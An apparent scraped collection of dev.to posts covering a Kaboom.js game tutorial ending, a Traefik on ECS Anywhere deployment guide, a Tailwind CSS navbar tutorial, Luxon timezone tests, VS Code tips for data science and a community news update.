area({ scale: 0.5 }),
solid(),
]);
```
For the HUD (heads-up display) we add
```ts
/**
* HUD
*/
const counter = add([
text("Score: 0", { size: 18, font: "sinko" }),
pos(40, 4),
z(100),
fixed(),
{ value: 0 },
]);
const health = add([
sprite("health", { width: 18, height: 18 }),
pos(12, 4),
fixed(),
]);
```
Then we create functions used by characters and items that define the actions.
```ts
/**
* Logics
*/
// Spin the sword 360 degree
function spin() {
let spinning = false;
return {
angle: 0,
id: "spin",
update() {
if (spinning) {
this.angle += 1200 * dt();
if (this.angle >= 360) {
this.angle = 0;
spinning = false;
}
}
},
spin() {
spinning = true;
},
};
}
// Reduces the life of the player.
// Reset player stats and move to home if there is no life left.
function reduceHealth() {
switch (health.frame) {
case 0:
health.frame = 1;
break;
case 1:
health.frame = 2;
break;
default:
go("home");
counter.value = 0;
counter.text = "0";
health.frame = 0;
break;
}
}
// Make enemy to move left and right on collision
function patrol(speed = 60, dir = 1) {
return {
on: (obj: any, col: any) => console.log(),
move: (x: any, y: any) => console.log(),
id: "patrol",
require: ["pos", "area"],
add() {
this.on("collide", (obj: any, col: any) => {
if (col.isLeft() || col.isRight()) {
dir = -dir;
}
});
},
update() {
this.move(speed * dir, 0);
},
};
}
// Show a dialog box. The player can save their progress on-chain if accept.
function addDialog() {
const h = 160;
const btnText = "Yes";
const bg = add([
pos(0, height() - h),
rect(width(), h),
color(0, 0, 0),
z(100),
fixed(),
]);
const txt = add([
text("", {
size: 18,
}),
pos(vec2(300, 400)),
scale(1),
origin("center"),
z(100),
fixed(),
]);
const btn = add([
text(btnText, {
size: 24,
}),
pos(vec2(400, 400)),
area({ cursor: "pointer" }),
scale(1),
origin("center"),
z(100),
fixed(),
]);
btn.onUpdate(() => {
if (btn.isHovering()) {
btn.scale = vec2(1.2);
} else {
btn.scale = vec2(1);
cursor("default");
}
});
btn.onClick(() => {
setUserAnchor(counter.value, health.frame);
});
bg.hidden = true;
txt.hidden = true;
btn.hidden = true;
return {
say(t: string) {
txt.text = t;
bg.hidden = false;
txt.hidden = false;
btn.hidden = false;
},
dismiss() {
if (!this.active()) {
return;
}
txt.text = "";
bg.hidden = true;
txt.hidden = true;
btn.hidden = true;
},
active() {
return !bg.hidden;
},
destroy() {
bg.destroy();
txt.destroy();
},
};
}
const dialog = addDialog();
```
One thing to notice here is what happens when the player interacts with the old man: the player can save the game progress by calling the `setUserAnchor(counter.value, health.frame)` function.
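The `reduceHealth` switch earlier is a tiny state machine over the health sprite's frame: 0 (full) goes to 1, 1 goes to 2, and one more hit sends the player back to the home scene. A pure sketch of the same transition (hypothetical, for illustration):

```ts
// Returns the next health frame, or null when no life is left.
function nextHealthFrame(frame: number): number | null {
  if (frame === 0) return 1;
  if (frame === 1) return 2;
  return null; // game over: reset stats and go back to the home scene
}
```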
Define what happens when the player comes into contact with enemies or items.
```ts
/**
* on Player Collides
*/
// Reduce the player life when collides with the ogre enemy
player.onCollide("ogre", async (obj, col) => {
play("hit");
reduceHealth();
});
// Increase the score when the player touch a coin. Make disappear the coin.
player.onCollide("coin", async (obj, col) => {
destroy(obj);
play("coin");
counter.value += 10;
counter.text = `Score: ${counter.value}`;
});
// Reduce the player life when collides with the monster enemy
// Move the player a fixed distance in the opposite direction of the collision.
player.onCollide("monster", async (obj, col) => {
if (col?.isRight()) {
player.moveBy(-32, 0);
}
if (col?.isLeft()) {
player.moveBy(32, 0);
}
if (col?.isBottom()) {
player.moveBy(0, -32);
}
if (col?.isTop()) {
player.moveBy(0, 32);
}
if (col?.displacement) play("hit");
reduceHealth();
});
// When the sword collides with ogre, kill it and receive 100 coins.
sword.onCollide("ogre", async (ogre) => {
play("kill");
counter.value += 100;
counter.text = `Score: ${counter.value}`;
destroy(ogre);
});
// Start a dialog with the old man on contact.
player.onCollide(OLDMAN, (obj) => {
dialog.say(obj.msg);
});
// Start a dialog with the old man on contact.
player.onCollide(OLDMAN2, (obj) => {
dialog.say(obj.msg);
});
// Start a dialog with the old man on contact.
player.onCollide(OLDMAN3, (obj) => {
dialog.say(obj.msg);
});
```
Set the camera to be zoomed and follow the player, the movements and the animation.
```ts
/**
* Player Controls
*/
// Follow the player with the camera
camScale(vec2(2));
player.onUpdate(() => {
camPos(player.pos);
});
// Press space to spin the sword
// Open a chest if the player is touching it.
onKeyPress("space", () => {
let interacted = false;
every("chest", (c) => {
if (player.isTouching(c)) {
if (c.opened) {
c.play("close");
c.opened = false;
} else {
c.play("open");
c.opened = true;
counter.value += 500;
counter.text = `Score: ${counter.value}`;
}
interacted = true;
}
});
if (!interacted) {
play("wooosh");
sword.spin();
}
});
// Player movement controls
onKeyDown("right", () => {
player.flipX(false);
sword.flipX(false);
player.move(SPEED, 0);
sword.follow.offset = vec2(-4, 9);
});
onKeyDown("left", () => {
player.flipX(true);
sword.flipX(true);
player.move(-SPEED, 0);
sword.follow.offset = vec2(4, 9);
});
onKeyDown("up", () => {
player.move(0, -SPEED);
});
onKeyDown("down", () => {
player.move(0, SPEED);
});
// Player animation while stationary and in motion
onKeyRelease(["left", "right", "up", "down"], () => {
player.play("idle");
});
onKeyPress(["left", "right", "up", "down"], () => {
dialog.dismiss();
player.play("run");
});
```
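The four `onKeyDown` handlers each contribute one axis of movement. Conceptually they combine into a single velocity vector; a sketch of that combination (diagonal normalization is omitted, just as in the game code):

```ts
// Combine currently held arrow keys into a movement vector.
function moveVector(held: Set<string>, speed: number): { x: number; y: number } {
  let x = 0;
  let y = 0;
  if (held.has("right")) x += speed;
  if (held.has("left")) x -= speed;
  if (held.has("up")) y -= speed; // screen Y grows downwards
  if (held.has("down")) y += speed;
  return { x, y };
}
```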
Congratulations! Now you know how to build an RPG game on Solana!
## What’s Next?
You have done an awesome job! I know the content is dense, and you made it to the end! The app is not complete; it is a starting point in the development of Web3 applications. From the knowledge you have acquired, you can move forward and build your own ideas. Here are some features you can add to the app:
1. Import game progress from a user account.
2. Fetch NFT Collection Metadata and add the items to the game.
3. Export game assets to NFTs or export coins to tokens.
4. Add more items, levels, or enemies.
5. Use the NFT character as a playable hero with different stats.
Star this [GitHub repository](https://github.com/aeither/dungeon3) to help it reach more people.
## Credits
Dungeon tileset II - https://0x72.itch.io/dungeontileset-ii
## Conclusion
In this guide, you learned how to build an RPG on Solana. We covered the on-chain program's code using the Seahorse framework and the Python programming language, used Thirdweb for the NFT collection drop, the mint, and the program calls, and loaded, created, and used game assets with Kaboom.
I hope you found it useful. Consider diving into [Seahorse](https://seahorse-lang.org/), [Thirdweb](https://thirdweb.com/network/solana) or [Kaboom](https://github.com/replit/kaboom) to learn more about the tools we have used.
Let's connect on [Twitter](https://twitter.com/giovannifulin) .
| aeither |
1,230,798 | Laravel: How to have custom “groupBy”? | A post by Sajad DP | 0 | 2022-10-26T12:33:00 | https://dev.to/sajaddp/laravel-how-to-have-custom-groupby-524k | laravel, php | {% youtube U8jVflN-eUY %} | sajaddp |
1,230,924 | ECS Anywhere & Traefik Proxy with ECS Compose-X | Original post can be found here along with the technical resources TL;DR Using ECS... | 0 | 2022-11-14T17:58:14 | https://dev.to/aws-builders/ecs-anywhere-traefik-proxy-with-ecs-compose-x-2k58 | aws, traefik, ecs, tutorial | [Original post can be found here](https://labs.compose-x.io/apps/traefik_ecs_part2.html) along with [the technical resources](https://github.com/compose-x/compose-x-labs/tree/main/traefik/part_2)
## TL;DR
Using [ECS Compose-X](https://docs.compose-x.io), deploy [Traefik Proxy](https://github.com/traefik/traefik) on-premise with [AWS ECS Anywhere](https://aws.amazon.com/ecs/anywhere/) with only a few changes from running on AWS EC2 or AWS Fargate.
---
## Introduction
### Our tools for today's lab
[ECS Compose-X](https://docs.compose-x.io) is an open-source project that allows you to use docker-compose services definitions, and render CFN templates (just like with AWS CDK, but without having to write code) to deploy your application service stacks.
[Traefik Proxy](https://github.com/traefik/traefik) is an open source project that will allow you to define ingress rules for your applications and will automatically route traffic to your backend services based on various rules. It is also capable of doing Service Discovery, and today we are going to look at the ECS & ECS Anywhere discovery providers.
[AWS ECS Anywhere](https://aws.amazon.com/ecs/anywhere/) is an extension to [AWS ECS](https://aws.amazon.com/ecs/), a managed container orchestration service, that now allows you to run your workloads in your datacenter/on-premise, and really just, anywhere!
### The objective
When running on AWS, we have access to services such as AWS Certificates Manager (ACM), AWS Load Balancing (manages ELB, ALB, NLB and more), which can offload a lot of complexity and is very feature rich.
However, when it comes to on-premise environments, hardware that would give us the same functionality (think F5 load balancers, or your expensive licensed VXLAN resources) is only affordable to a few, and for a home-labber such as myself, way out of budget.
So I needed an alternative solution that would allow me to use AWS ECS services, route traffic to my services based on service discovery. It should also be able to deal with managing SSL certificates for me. And finally, I must be able to deal with non-persistent storage.
## Welcome Traefik Proxy
For years, I have been an NGINX and/or HAProxy user. They are very lightweight and very popular, with great documentation and community support in general.
But they aren't quite capable of doing service discovery all by themselves.
I came across Traefik Proxy, and a whole new world of capabilities was now wide open. With service discovery providers, Traefik can scrape your services and, based on labels/tags, identify instructions to perform. And AWS ECS is one such provider.
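With the ECS provider, those instructions take the form of labels (Docker tags) on the service. A hypothetical example of such labels, not taken from the lab itself (the hostname is a placeholder):

```yaml
services:
  whoami:
    image: traefik/whoami
    labels:
      # Opt this service into Traefik's discovery
      traefik.enable: "true"
      # Route requests for this host to the service
      traefik.http.routers.whoami.rule: Host(`whoami.example.com`)
```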
### Just a tiny little problem
When I first tried Traefik a little over a year ago for ECS Anywhere, it wouldn't work. That's because until then, Traefik only considered using Fargate or EC2 instances to run the containers. There was no implementation for discovering AWS ECS Anywhere on-premise instances.
**This has been since addressed, and one can specifically enable the ECS Anywhere discovery in Traefik.**
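In recent Traefik versions this is a static-configuration toggle on the ECS provider. A minimal sketch (check the Traefik ECS provider documentation for your version; the cluster name is a placeholder):

```yaml
providers:
  ecs:
    ecsAnywhere: true          # also discover ECS Anywhere (external) instances
    clusters:
      - MyExistingECSCluster   # placeholder cluster name
```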
### Traefik and Let's Encrypt SSL management
When you define routers, you can specify whether or not you want Traefik to provision Let's Encrypt certificates.
With Traefik, you can automatically get new certificates whenever you need them. There are different validation methods; my chosen one is DNS validation.
For validation, given that my DNS domain is managed in Route53, I simply tell Traefik to use that DNS method / zone for validation.
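In Traefik's static configuration, that looks roughly like this (a sketch with placeholder values; see Traefik's ACME documentation for the full set of options):

```yaml
certificatesResolvers:
  letsencrypt:
    acme:
      email: you@example.com          # placeholder contact email
      storage: /letsencrypt/acme.json # file where issued certificates are kept
      dnsChallenge:
        provider: route53             # validate via my Route53-hosted zone
```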
#### Why DNS validation works for me
If I have internally exposed services (not available on the internet) but still want SSL certificates provisioned for them, DNS validation is the only option. Beyond that, it generally comes down to your preference.
## Deployment
### Prerequisites
You will need
* An AWS Account
* A local user configured with IAM permissions to deploy resources
* An existing ECS Cluster with a registered ECS instance that runs on-premise
* ECS Compose-X installed (version 0.22 or above). See below.
#### Compose-X install
You can install it locally for your user
```shell
pip install pip -U;
pip install --user ecs-composex
```
or install it in a python virtual/isolated environment
```shell
python3 -m venv compose-x
source compose-x/bin/activate
pip install pip -U
pip install ecs-composex
```
Once you have installed it, run the following command that will ensure we have the necessary settings and resources to get started.
```shell
ecs-compose-x init
```
### Clone the labs repo
Clone the repo, and head to the configuration files.
```shell
git clone https://github.com/compose-x/compose-x-labs.git
cd compose-x-labs/traefik/part_2/
```
In the current files, you will have to change the domain name in use.
You can either edit it with your preferred IDE, or simply run
```shell
sed -i 's/bdd-testing.compose-x.io/<your_domain_name.tld>/g' *.yaml
```
If your domain is not maintained in AWS Route53, you will need to head over to [the Let's Encrypt ACME documentation](https://doc.traefik.io/traefik/https/acme/) in order to use a different validation method.
### Getting ready to deploy
The deployment to ECS Anywhere is only a command away
```shell
CLUSTER_NAME=MyExistingECSCluster ecs-compose-x up \
-n traefik-anywhere \
-d templates \
-f docker-compose.yaml \
-f ecs-anywhere.yaml
```
Compose-X will render all of the CFN templates and store them in your local folder (under `templates`) as well as in AWS S3; the templates must be in S3 for CFN nested stacks.
After a few minutes, you should have Traefik running on your ECS Anywhere instances.
### Adding SSL Certificates backup.
The Let's Encrypt "production" endpoint has a rate limit on the number of certificates requested per domain.
So if you are new to this, we recommend you [use the Let's Encrypt staging environment](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/ecs-anywhere.yaml#L36-L37), which will keep you from hitting that rate limit.
Sadly, persistent storage for the file that holds the SSL certificates Traefik requests from Let's Encrypt does not seem to be a feature we will see any time soon.
So instead, we are going to implement the backup and restore ourselves.
Using two sidecars, one to restore the file before Traefik starts and another that watches for changes and automatically backs the file up to AWS S3, we make sure that we don't request certificates we have already provisioned.
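As a rough compose sketch of that pattern (service names, images and the bucket are illustrative assumptions on my part; see the `backup.yaml` file in the labs repo for the real definitions):

```yaml
services:
  certs-restore:                        # runs once, restores acme.json before Traefik starts
    image: amazon/aws-cli
    command: s3 cp s3://my-certs-bucket/acme.json /letsencrypt/acme.json
    volumes:
      - letsencrypt:/letsencrypt

  certs-backup:                         # periodically syncs the file back to S3
    image: amazon/aws-cli
    entrypoint: /bin/sh
    command: -c 'while true; do aws s3 cp /letsencrypt/acme.json s3://my-certs-bucket/acme.json; sleep 60; done'
    volumes:
      - letsencrypt:/letsencrypt

  traefik:
    image: traefik:v2.9
    depends_on:
      certs-restore:
        condition: service_completed_successfully
    volumes:
      - letsencrypt:/letsencrypt

volumes:
  letsencrypt:
```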
To deploy the solution, we added the [backup.yaml](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/backup.yaml) file to our deployment command.
**Note**: the S3 bucket already exists for us; if you want to use an existing one, you will need to adapt the `Lookup` [Tags](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/backup.yaml#L77-L79) in order to use your own/the right bucket.
So now, we deploy our updated definition to AWS
```shell
CLUSTER_NAME=MyExistingECSCluster ecs-compose-x up \
-n traefik-anywhere \
-d templates \
-f docker-compose.yaml \
    -f ecs-anywhere.yaml \
    -f backup.yaml
```
**Hint**: the order of the files **does matter**.
And that's it! You now have successfully deployed Traefik to ECS Anywhere, with automated backup & restore for your certificates.
To add additional services you wish Traefik to route to, simply deploy them with the appropriate labels, just like we did in the demo for the [whoami service](https://github.com/compose-x/compose-x-labs/blob/main/traefik/part_2/ecs-anywhere.yaml#L140-L154).
| johnpreston |
1,231,214 | Tailwind CSS tutorial #3: Responsive Navbar | Hey everyone, in many apps you need a navbar which slides in if you click on a hamburger icon and... | 0 | 2022-10-26T17:26:59 | https://dev.to/fromshubhi/tailwind-css-tutorial-3-responsive-navbar-47ip | tailwindcss, css, codenewbie | Hey everyone! In many apps you need a navbar that slides in when you click on a hamburger icon and that is also responsive. In this tutorial, we are going to see how to build one.
## What we are building:
We will be building a simple navbar with HTML and CSS. We will use the below design as the guideline for our component.

## Requirements
-Prior knowledge of HTML and CSS
-[HTML template for navbar](https://github.com/codewithshubhi/learn-tailwind-css/blob/main/navindex.html)
-Code editor of your choice.
## Implementation
**Step 1**
Get the [html code template](https://github.com/codewithshubhi/learn-tailwind-css/blob/main/navindex.html) and install Tailwind CSS. You will then need to add the Tailwind CSS you have installed into the project, which you can do by using the "link" tag to link the Tailwind CSS file to the HTML template.
```
npm install -D tailwindcss postcss autoprefixer
npx tailwindcss init -p
```
**Code:**
```html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Navigation</title>
<link rel="stylesheet" href="style.css">
</head>
<body></body>
</html>
```
Check out the detailed setup of Tailwind [here](https://dev.to/shubhicodes/get-started-with-tailwind-css-2g98).
Since we know it's a navigation component, we will use the `nav` element as our wrapping container. Let's also add a class of `navbar`.
```html
<nav class="navbar"></nav>
```
**Step 2**
Next, I would review the content inside the navigation.
I would split the content into two parts:
1. The brand content/body
2. The navigational items
The reason I would split this up is that the brand content isn't necessarily a navigation item and I want the HTML to have the correct meaning.
**Step 3**
Next, let's implement option one from Step 2, the `brand` content. Since we know from the requirements that it needs to be a link, I would use an anchor tag. I will also add a class name of `brand` so we can style it later.
**Our code should now look like this:**
```html
<nav class="navbar">
<a class="brand" href="#">My Portfolio</a>
</nav>
```

**Step 4**
Next, let's implement option two from Step 2, the navigational items. I would classify these as a list of links. To keep our HTML structure semantic, I would use a list to structure the items.
Our code should now look like this:
```html
<nav class="navbar">
<a class="brand" href="#">My portfolio</a>
<ul>
<li>
<a href="#">Home</a>
</li>
<li>
<a href="#">Blog </a>
</li>
<li>
<a href="#">About Me</a>
</li>
<li>
<a href="#">Contact</a>
</li>
</ul>
</nav>
```

**Step 5**
At this stage, we will add the necessary menu items to help users navigate around the website. Below is the code for the menu.
**Code**
```html
<!-- Nav menu -->
<div
class="w-full lg:w-auto block lg:flex lg:items-center lg:inline-block hidden"
id="navbar"
>
<div class="lg:flex-grow text-2xl text-center space-x-3">
<a href="#" class="block lg:inline-block hover:text-green-400 mt-4">
Home
</a>
<a href="#" class="block lg:inline-block hover:text-green-400 mt-4">
Blog
</a>
<a
href="#"
class="block lg:inline-block hover:text-green-400 mt-4 mb-3"
>
About Me
</a>
<a
href="#"
class="lg:inline-block hover:text-green-400 mt-6 border rounded border-white hover:border-transparent hover:bg-white px-4"
>
Contact
</a>
</div>
</div>
</nav>
```
We added some classes to the menu to help it fit into our navigation bar.

In the code above, we used an SVG to create a hamburger icon for the small screen and gave it a height and width of 6. We also changed its color to gray. Another class we included is `flex`, which lays out the hamburger menu along with the items in the Tailwind CSS navbar.
**Step 6**
Add the mobile button
Next, we are going to create the menu toggle for small screens, then use JavaScript to toggle the menu we created.
The JavaScript code will be written using the `<script>` tag.
We can go ahead and grab the HTML element we need in order to apply this functionality.
**Code**
```html
<script>
var navbar = document.getElementById("navbar");
const toggle_nav = () => {
navbar.classList.toggle("hidden");
};
  // Close menu if window size increases
window.onresize = () => {
let viewportWidth = window.innerWidth;
if (viewportWidth > 1050) {
navbar.classList.add("hidden");
}
};
</script>
```
## Overview
**The overall code will be like the code below**:
[Repo link](https://github.com/codewithshubhi/learn-tailwind-css/blob/main/navbar.html)
## Conclusion
With some basic knowledge of HTML and CSS, we were able to create a fully functioning navbar component.
If you liked this article, consider following me on [Dev.to](https://dev.to/shubhicodes) for my latest publications. You can reach me on [Twitter](https://twitter.com/heyShubhi).
Keep learning! Keep coding!! 💛
| fromshubhi |
1,269,048 | Luxon Timezones and JS-Date interop | If you ever wondered how luxon and native JS-Dates (with TimeZones) behave when converting them... | 0 | 2022-11-23T16:00:20 | https://dev.to/nidomiro/luxon-timezones-and-js-date-interop-5ceg | javascript, webdev, typescript | If you ever wondered how [luxon](https://moment.github.io/luxon/) and native [JS-Dates](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Date?retiredLocale=de) (with TimeZones) behave when converting them between each other and [ISO-Date-Strings](https://www.w3.org/TR/NOTE-datetime) here are my tests:
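First, a quick baseline of my own using only native `Date` (assuming Node): whatever offset appears in the parsed string, the stored value is an absolute instant, and `toISOString()` always serializes in UTC.

```javascript
// A parsed offset is normalized away: Date stores an absolute instant,
// and toISOString() always emits UTC.
const local = new Date('2023-07-21T09:35:31.825+01:00');
const utc = new Date('2023-07-21T08:35:31.825Z');

console.log(local.getTime() === utc.getTime()); // true (same instant)
console.log(local.toISOString()); // '2023-07-21T08:35:31.825Z'
```

Keep that in mind while reading the tables below.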
```ts
import {DateTime} from 'luxon'
const date = new Date();
const offset = date.getTimezoneOffset();
console.log('TimeZoneOffset(min): ', offset * -1);
console.log('TimeZoneOffset( h ): ', offset / 60 * -1);
/*
TimeZoneOffset(min): 60
TimeZoneOffset( h ): 1
*/
const strLocal = '2023-07-21T09:35:31.825+01:00'
const strUtc = '2023-07-21T08:35:31.825Z'
const jsDateLocal = new Date(strLocal)
const jsDateUTC = new Date(strUtc)
const dateTimeLocal = DateTime.fromISO(strLocal)
const dateTimeUTC = DateTime.fromISO(strUtc)
console.log(`ToLocal`)
console.table({
jsDateLocal: jsDateLocal.toLocaleString(),
jsDateUTC: jsDateUTC.toLocaleString(),
dateTimeLocal: dateTimeLocal.toLocaleString(),
dateTimeUTC: dateTimeUTC.toLocaleString(),
dateTimeLocalFull: dateTimeLocal.toLocaleString(DateTime.DATETIME_FULL),
dateTimeUTCFull: dateTimeUTC.toLocaleString(DateTime.DATETIME_FULL),
})
/*
┌───────────────────┬───────────────────────────────────┐
│ (index) │ Values │
├───────────────────┼───────────────────────────────────┤
│ jsDateLocal │ '7/21/2023, 10:35:31 AM' │
│ jsDateUTC │ '7/21/2023, 10:35:31 AM' │
│ dateTimeLocal │ '7/21/2023' │
│ dateTimeUTC │ '7/21/2023' │
│ dateTimeLocalFull │ 'July 21, 2023 at 10:35 AM GMT+2' │
│ dateTimeUTCFull │ 'July 21, 2023 at 10:35 AM GMT+2' │
└───────────────────┴───────────────────────────────────┘
*/
console.log(`ToIsoTimestamp`)
console.table({
jsDateLocalToIso: jsDateLocal.toISOString(),
jsDateUTCToIso: jsDateUTC.toISOString(),
dateTimeLocalToIso: dateTimeLocal.toISO(),
dateTimeUtcToIso: dateTimeUTC.toISO(),
dateTimeLocalToUtcToIso: dateTimeLocal.toUTC().toISO(),
dateTimeUtcToUtcToIso: dateTimeUTC.toUTC().toISO(),
})
/*
┌─────────────────────────┬─────────────────────────────────┐
│ (index) │ Values │
├─────────────────────────┼─────────────────────────────────┤
│ jsDateLocalToIso │ '2023-07-21T08:35:31.825Z' │
│ jsDateUTCToIso │ '2023-07-21T08:35:31.825Z' │
│ dateTimeLocalToIso │ '2023-07-21T10:35:31.825+02:00' │
│ dateTimeUtcToIso │ '2023-07-21T10:35:31.825+02:00' │
│ dateTimeLocalToUtcToIso │ '2023-07-21T08:35:31.825Z' │
│ dateTimeUtcToUtcToIso │ '2023-07-21T08:35:31.825Z' │
└─────────────────────────┴─────────────────────────────────┘
*/
console.log(`jsDate to DateTime to Iso`)
console.table({
fromJsLocal: DateTime.fromJSDate(jsDateLocal, ).toISO(),
fromJsUTC: DateTime.fromJSDate(jsDateUTC).toISO(),
fromJsLocalWithUtc: DateTime.fromJSDate(jsDateLocal, {zone: 'utc'}).toISO(),
fromJsUTCWithUtc: DateTime.fromJSDate(jsDateUTC, {zone: 'utc'}).toISO(),
fromJsLocalToUtc: DateTime.fromJSDate(jsDateLocal).toUTC().toISO(),
fromJsUTCToUtc: DateTime.fromJSDate(jsDateUTC).toUTC().toISO(),
fromJsLocalWithEuropeBerlin: DateTime.fromJSDate(jsDateLocal, {zone: 'Europe/Berlin'}).toISO(),
fromJsUTCWithEuropeBerlin: DateTime.fromJSDate(jsDateUTC, {zone: 'Europe/Berlin'}).toISO(),
fromJsLocalWithEuropeBerlinToUtc: DateTime.fromJSDate(jsDateLocal, {zone: 'Europe/Berlin'}).toUTC().toISO(),
fromJsUTCWithEuropeBerlinToUtc: DateTime.fromJSDate(jsDateUTC, {zone: 'Europe/Berlin'}).toUTC().toISO(),
})
/*
┌──────────────────────────────────┬─────────────────────────────────┐
│ (index) │ Values │
├──────────────────────────────────┼─────────────────────────────────┤
│ fromJsLocal │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsUTC │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsLocalWithUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsUTCWithUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsLocalToUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsUTCToUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsLocalWithEuropeBerlin │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsUTCWithEuropeBerlin │ '2023-07-21T10:35:31.825+02:00' │
│ fromJsLocalWithEuropeBerlinToUtc │ '2023-07-21T08:35:31.825Z' │
│ fromJsUTCWithEuropeBerlinToUtc │ '2023-07-21T08:35:31.825Z' │
└──────────────────────────────────┴─────────────────────────────────┘
*/
``` | nidomiro |
1,231,897 | My Hacktober Experience | October, also known as Hacktober for devs, is a really awesome month. Hacktoberfest is a very good... | 0 | 2022-10-30T06:15:07 | https://dev.to/dilutewater/my-hacktober-experience-46nm | programming, beginners, opensource, hacktoberfest | October, also known as Hacktober for devs, is a really awesome month. Hacktoberfest is a very good opportunity for beginners to start their open source journey. Open source is a really fun journey to begin.
I participated in Hacktoberfest as well as a hackathon this month, and also an open source event.
This was kind of a first experience for all of these.
## Hacktoberfest
This year was my first Hacktober. I made some basic contributions to a few open source repos. That's the beauty of Hacktoberfest: even beginners are welcome, and even the simplest contributions are appreciated. Even if most people do it for the swag, it's still a nice motivation for beginners to start.
I completed my 4 contributions in just a few days and also received the Holopin badges. They look pretty cool, to be honest. Here is my Holopin board.
**Live Holopin Board (This may be changed with different badges if viewed at a later date):**
[](https://holopin.io/@dilutewater)
**Static version:**

## Hackathon

So this month, our college organized a hackathon as well. I decided to participate in it. This was my first ever hackathon. It was quite fun and I also learned a lot. I had an awesome team to work with.
We were not even looking to win any prize this time. However, after completing the project, we thought we could win the Replit track prize. The results for the track are still not out, so we are still waiting.
## DelhiFOSS event

I also attended the DelhiFOSS event hosted by FOSS United. It was very fun and informative. I met many awesome people there and learned a lot.
Attending all these events was really fun. I learned a lot, enjoyed myself, and met many new people.
You can also follow me on twitter for regular updates.
Twitter: [https://twitter.com/notnotrachit](https://twitter.com/notnotrachit)
| dilutewater |
1,232,229 | Data Science: Best Vscode settings | VS code has become the tool for any programming project and data science is one of them. Most data... | 20,156 | 2022-10-27T11:30:00 | https://dev.to/azadkshitij/best-vscode-settings-for-data-scientist-48nk | python, datascience, vscode, jupyter |
VS Code has become the go-to tool for any programming project, and data science is one of them. Most data scientists like to use Jupyter Notebook or JupyterLab, but what they may not know is that VS Code supports Jupyter notebooks, and that you can do much more than just use notebooks. One of the best features of VS Code for data science is the **Interactive Python window**; we will talk about that later. First, let's talk about some other features.
## 1. IntelliSense
> IntelliSense is a general term for various code editing features including: code completion, parameter info, quick info, and member lists. IntelliSense features are sometimes called by other names such as "code completion", "content assist", and "code hinting."

When we install the Python extension for VS Code, it comes with IntelliSense, and it works as intended. You can improve IntelliSense with type annotations in your project.

As you can see in the image above, there are no suggestions for the `name` parameter, but as soon as we define the type of the parameter, VS Code will show all the available methods for that datatype (image below).

## 2. Indent (Space vs Tabs)
> At the end of the day, tabs versus spaces is truly a matter of preference, however the tab is still the character specifically designed for indentation, and using one tab character per indentation level instead of 2 or 4 spaces will use less disk space / memory / compiler resources and the like.
It depends on the individual. I prefer tabs, set to a 2-space (2-column) width, as they occupy less space and take only one keystroke, and every keystroke matters. To change the indent size in VS Code, follow the steps below...


## 3. Text Warp
Most of us don't like text to run off the screen. To toggle wrapping on or off on a per-file basis, simply press `ALT + Z`. If you almost _never_ want to turn text wrapping off, you can make it the default. Inside `settings.json`, simply paste in the following code, and your text will wrap by default:
```json
{ "editor.wordWrap": "on" }
```
## 4. Evaluate Math Expression
Did you know VS Code has a built-in calculator? You can evaluate basic math operations: just select the expression, press `ctrl+shift+p`, and search for "Evaluate" to find the option.

## 5. Format on Save
Install *[black](https://github.com/psf/black)*, a Python formatter that will help us follow consistent formatting across all our data science projects. Command:
```bash
pip install black
```
Open your VSCode settings, by going 'Code -> Preferences -> Settings'. Search for "python formatting provider" and select "black" from the dropdown menu:

In the settings, search for "format on save" and enable the "Editor: Format on Save" option:

## 6. Snippets
You can install extensions for snippets, but you can also define your own snippets. With this feature you can type a few characters to insert repeated code like import statements, plotting functions, etc.

## 7. Interactive Python Window
VS Code supports an interactive Python window, where you can run Python code just like in a Jupyter notebook, but even better, your main code is stored in a single Python file. This is a very important and productive feature for data scientists. For this to work you need to change the settings with...
```json
"jupyter.sendSelectionToInteractiveWindow": true // <---- Very Important
```

## 8. Remote access to VMs
Odds are that you’ll run code on a server, a virtual machine or some other hardware that you might want to connect to via SSH. Fortunately, you can connect to any of them and still carry on using your local VS Code installation by using the [Remote SSH](https://marketplace.visualstudio.com/items?itemName=ms-vscode-remote.remote-ssh) extension.
## 9. CSV
As a data scientist you have to deal with a lot of file types that store data, and CSV is the most common format for storing huge amounts of data. Since CSV is a text file, you can open it directly in VS Code, but to make it more usable and readable we can use extensions such as...
1. [Rainbow CSV](https://marketplace.visualstudio.com/items?itemName=mechatroner.rainbow-csv), which provides highlighting for your CSV files.

2. [Edit csv](https://marketplace.visualstudio.com/items?itemName=janisdd.vscode-edit-csv), which has an Excel-like UI to edit and update your CSV files.

As the article is getting longer, we will talk about some more settings in future articles, so make sure to follow the series to not miss any updates. If you have anything to say, comment down below. I'm new to blog writing, so any type of feedback is appreciated. Thanks! | azadkshitij |
1,232,476 | Software AG Tech Community Highlights - Q3, 2022 | The past three months have been really busy in the Software AG Tech Community. See what you might... | 0 | 2022-10-28T08:35:50 | https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275/1 | community, news, iot, webmethods | ---
title: Software AG Tech Community Highlights - Q3, 2022
published: true
date: 2022-10-05 08:15:43 UTC
tags: community, news, iot, webmethods
canonical_url: https://tech.forums.softwareag.com/t/community-highlights-q3-2022/264275/1
---
The past three months have been really busy in the [Software AG Tech Community](https://tech.forums.softwareag.com/). See what you might have missed below!
## Feedback and Ideas section
You can now share your feedback not only about the Tech Community, but any product or platform. We have introduced:
- [Community news, tips & tricks](https://tech.forums.softwareag.com/c/feedback/community-news/5) - Discover new features, community enhancements, and user guides.
- [Feature requests](https://tech.forums.softwareag.com/c/feedback/feedback-feature-requests/137) - Let us know how we can improve! Share your ideas and feature requests. What will help you do your job better? What do you like or dislike in Software AG’s products, solutions and platform?
- [Coffee break (discuss anything)](https://tech.forums.softwareag.com/c/feedback/coffee-break/138) - This is the place to discuss topics that don’t have a “right” answer and talk about anything.
